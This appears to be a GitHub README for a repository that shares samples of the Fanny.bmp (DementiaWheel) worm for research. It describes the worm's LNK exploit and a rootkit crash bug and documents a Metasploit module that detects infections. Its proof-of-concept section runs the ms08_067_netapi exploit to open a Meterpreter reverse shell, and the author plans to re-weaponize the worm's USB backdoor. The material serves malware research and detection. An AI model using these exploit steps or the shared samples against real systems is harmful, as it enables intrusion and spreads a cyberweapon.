Skip to content

Latest commit

 

History

History
328 lines (189 loc) · 15.2 KB

README.md

File metadata and controls

328 lines (189 loc) · 15.2 KB

$\textcolor{red}{\textsf{ MALWARE AHEAD! IF YOU DO NOT KNOW WHAT THAT IS - LEAVE}}$

Note: if you see a lot of $\textcolor{red}{\ then you need to enable javascript; it's basically just Red Text.

⚠️ This is only for research and Educational Purposes! Even if you run these in a Virtual Machine, I would [still] USE CAUTION. ⚠️

FannyBMP or DementiaWheel

I made yet another Branch "only_malware" which ONLY CONTAINS THE FANNY.BMP MALWARE

rootkit quick overview

image

  • Q: why did I use the 'runas' dialog to demonstrate the rootkit?
  • A: cuz I wanted to show it does work on some text-inputs, as well

And another screenshot:

image


Note! the technical report I wrote has a few* painfully-obvious flaws (like being written in a hurry, so it has some* grammar errors) the report will be re-written and re-publicized as the same with a new version number. This new version, will be much better in general. And more Related to the actual research I did on the malware rather than the malware in general.

I have quite little time on my hands now, so it will be delayd (this is just how I am).

Points

Instead of having all the text (literally, all text) shown all at once, I decided to make clickable points, (if clicking doesn't work, please refer to the raw version of the readme or check it on another device)

the most important things related to this repo is (most notably) My contribution(this repo) to the Rapid7 project(Metasploit);

Basic Info
Name
            FannyBMP or as the codename, DementiaWheel.

Description
             FannyBMP or as the codename, DementiaWheel
             Is a worm that exploited zero day vulns
             (more specifically, the LNK Exploit CVE-2010-2568).
             Which allowed it to spread (via usb) even if USB Autorun was turned off.
             This is the same(although somewhat more obfuscated) exploit that was used in StuxNet.


References
- https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787


CVE
 - 2010-2568
POC's (Proof Of Concepts)

YouTube infection run

image

Fanny all files completely provided

includes:

☢️ Still unsorted (sorting it at the moment) ☢️

not-done ⚠️

related:

--- please note that documentation(writing) (as below) is not my strongest front; so please this will be fuzzy; hopefully readable. -----

important below

⚠️ this repo has serious issues. (1 major is the lot of Unnec. stuff, like old README (etc), ) Why?! well, when I uploaded this - I did not think this would be interesting for others; so I didn't pay attention to make it "really readable"

⚠️ which I was wrong about (soo wrong) - which is why I will change this very soon as I want this to be as clean as possible;

therefore - please routinely check the 2nd branch (if possible)

as I will upload and make it all very cleanly organized; with screenshots; and everything in one place(or, Hopefully I will be able to at least, make it decently well)

thanks for understanding! have a good day!


MAJOR update coming soon:

I will (when I am done with the OSCP Exam, which is very soon! it actually is on 18th Jan! (writing from 2021 25 Dec (Happy Christmas! :) ))) Soon create & upload the following:

  • Recording (From scratch(0%), to 100%) of when Fanny.bmp infects a PLC (although.. It does not do anything, or even "infects a PLC" but, it detects PLC's in a kinda-similar way StuXNet did.) (although a virtual one, since I have not real access to a nuclear reactor.. For.. well, quite - obvious reasons.
  • Recording (again, From 0 to 100%) of how one can "re-weaponize" Fanny.bmp (or,DementiaWheel as it's codename suggests) the USB-Backdoor to carry commands from & to Metasploit. (This is tested and, let's just say - it works, but needs improvement. (Massive improvements that is)) <- Still working on it.
  • A mini-library written in C (in combination with Lua) to make (the 2 points above ) a bit more user-friendly
  • (JUST so you don't need to be a debugger-professional to understand how to get a reverse shell trough fanny's USB Backdoor for example.)

For the story Refer to both the article(s) I've been provided below, but also - if you're interested; read my theory fanny.bmp's and StuXNet's purpose in the ISSUES page. "The Purpose of Fanny.bmp - in relation to StuXNet #7 "

Related samples: Agent.btz and Stuxnet

Refs:

[+1] video, demonstrating a Re-Creation of fanny.bmp to display a MessageBox(soon cmd)

Note, I have created a new POC video demonstrating fanny.bmp, as well as a bug

(that I do not think is known? At least probably not to the developers that made fanny.bmp, although this is probably quite expected, that it would hide files using the prefix the rootkit is designed to just "hide").

But the unexpected thing was "to me anyway" that, it crashed explorer (and, the whole XP) while doing this.) This is done by "using" the rootkit provided in fanny.bmp.

How to re-create the Crash/bug:

If you name a folder/file/shortcut " _ _ e _ _ . l n k " (Note: Explorer will make the file not-displayed when you type e) and then, hopefully - it will crash with an error message. Or 2 error messages by the way.

POC (Proof Of Concept) Video(s)


The renewed video is here:

https://youtu.be/Uto_lcD2f38

###As well as the video file itself, here: https://github.com/loneicewolf/fanny.bmp/blob/main/ReNewed(Fannybmp%20Winxp%20Poc)%20(With%20Rootkit%20Demo%20%2B%20Bug%20Crash)%20.mp4.7z


The screenshot of the "empty" (not infected by fanny) USB (that, was "experimented" with and later, as well infected by fanny.bmp) Displaying the files that the rootkit tried to hide, but it crashed explorer.exe with 2 error messages instead.

https://github.com/loneicewolf/fanny.bmp/blob/main/SanUltra%20(Fanny.bmp%20Bug).png

2 Error messages from fanny.bmp while it's rootkit was in use (and tried to hide a file/directory created by the user, called "e.lnk" in this example)

https://github.com/loneicewolf/fanny.bmp/blob/main/2Errors(while%20rootkit%20tried%20to%20hide%20__).png

For detection of fanny.bmp infections using MetaSploit,

Documentation for

the module avail. here: at the wiki https://github.com/loneicewolf/fanny.bmp/wiki/Docs


POCS

By-OS:


All these I thought of earlier providing, since I was one of the people that got this on my USB stick (my USB got infected long long time ago, Years ago now.) - But now - when I looked closer and I saw that some of these isn't even available online (Some of them are, still - like fanny.bmp and maybe some others, and ECELP4.acm) but not any of mscorwin / comhost, etc. (If they are - I would love to hear that! and the source of it. The more sources of same malware - the better. It strengthens the "community" if I can put it that way. And it is easier to find if all material is gathered at one place. But I thought of providing all of these to malware researchers. As well as for academical purposes.


Note: In the video I provided, I had slight problems with the USB Keyboard. So I wrote "EDUCATIONAK" but meant "EDUCATIONAL". Contact me for any details.

(Q) Why would you want to upload malware? You're literally providing CyberWeapons! (A) I believe in Open-Source, and that even though in this scenario, can hopefully help malware researchers provide better protection.

But the major point, is actually - as said above, but adding the following reason:

  • to help the feature find these malware and samples. As I think there are very little (if not none) of these easily accessible online. (Samples that is)

To Detect fanny, refer to this article:

And (for "optional" reading) I would suggest this one: "AiR-ViBeR: Exfiltrating Data from Air-GappedComputers via Covert Surface ViBrAtIoNs." - writeup about Stuxnet,Fanny, Agent.btz (which is really like each others in ways)

POC:

First, Git clone the fanny_bmp_check.rb from Metasploit! (Now - always go to metasploit (oficially) to get the fanny.bmp module. To always get the latest version of it. In which I believe is vital when we talk security)

place it into your msf folder, (important, check the following step before placing it) usually located in /root/.msf4/modules/

  • make the following folders: (under each other) /post/windows/gather/forensics/ <fanny_bmp_check.rb here>

Start msfconsole

use exploit/windows/smb/ms08_067_netapi

set RHOST and LHOST.

msf6 exploit(windows/smb/ms08_067_netapi) > run

  [*] Started reverse TCP handler on 192.168.122.1:4444 
  [*] 192.168.122.160:445 - Automatically detecting the target...
  [*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
  [*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
  [*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
  [*] Sending stage (175174 bytes) to 192.168.122.160
  [*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100

meterpreter > run post/windows/gather/forensics/fanny_bmp_check

[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.